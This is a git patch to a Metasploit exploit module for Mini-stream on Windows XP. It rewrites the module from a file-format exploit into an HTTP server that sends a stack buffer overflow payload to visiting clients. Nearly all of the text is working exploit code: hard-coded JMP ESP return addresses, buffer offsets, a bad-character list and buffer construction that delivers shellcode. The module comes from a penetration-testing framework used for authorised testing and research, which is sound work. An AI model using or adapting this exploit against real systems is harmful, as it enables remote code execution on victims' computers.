From 3d6f631780456bee97cf10863421eba1f3d40716 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Fri, 4 Nov 2011 08:20:43 +0000 Subject: [PATCH] Upgrade mini_stream as a remote module. Account for all variables that affect the offset to EIP. Also digital1 = Ron. git-svn-id: file:///home/svn/framework3/trunk@14155 4d416f70-5f16-0410-b530-b9f4589650da --- .../{fileformat => misc}/mini_stream.rb | 53 +++++++++++++------ 1 file changed, 36 insertions(+), 17 deletions(-) rename modules/exploits/windows/{fileformat => misc}/mini_stream.rb (56%) diff --git a/modules/exploits/windows/fileformat/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb similarity index 56% rename from modules/exploits/windows/fileformat/mini_stream.rb rename to modules/exploits/windows/misc/mini_stream.rb index baae0a16e7..92aa023948 100644 --- a/modules/exploits/windows/fileformat/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -14,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, @@ -28,8 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'CORELAN Security Team ', - 'Ron Henry ', # Return address update - 'dijital1', + 'Ron Henry ', # dijital1; Return address update ], 'Version' => '$Revision$', 'References' => @@ -40,19 +39,30 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 3500, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30", - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP3 - English', { 'Ret' => 0x7e429353} ], # 0x7e429353 JMP ESP - USER32.dll - [ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll + [ + 'Windows XP SP3 ENG', + { + 'Ret' => 0x7e429353, # 0x7e429353 JMP ESP - USER32.dll + 'Offset' => 17417 + } + ], + [ + 'Windows XP SP2 ENG', + { + 'Ret' => 0x7c941eed, # 0x7c941eed JMP ESP - SHELL32.dll + 'Offset' => 17417 + } + ] ], 'Privileged' => false, 'DisclosureDate' => 'Dec 25 2009', @@ -60,21 +70,30 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.pls']), + OptString.new('URIPATH', [ true, 'The URI to use for this exploit', 'msf.pls']) ], self.class) end - def exploit - sploit = rand_text_alphanumeric(17403) - sploit << [target.ret].pack('V') - sploit << "CAFE" * 8 - sploit << payload.encoded + def on_request_uri(cli, request) + # Calculate the correct offset + host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] + host << ":#{datastore['SRVPORT']}/" + offset = target['Offset'] - host.length - print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(sploit) - print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application") + # Construct our buffer + sploit = rand_text_alpha(offset) + sploit << [target.ret].pack('V') + sploit << make_nops(32) + sploit << @p + + print_status("Sending malicous payload #{cli.peerhost}:#{cli.peerport}...") + send_response(cli, sploit, {'Content-Type'=>'application/pls+xml'}) + end + + def exploit + @p = payload.encoded + super end end -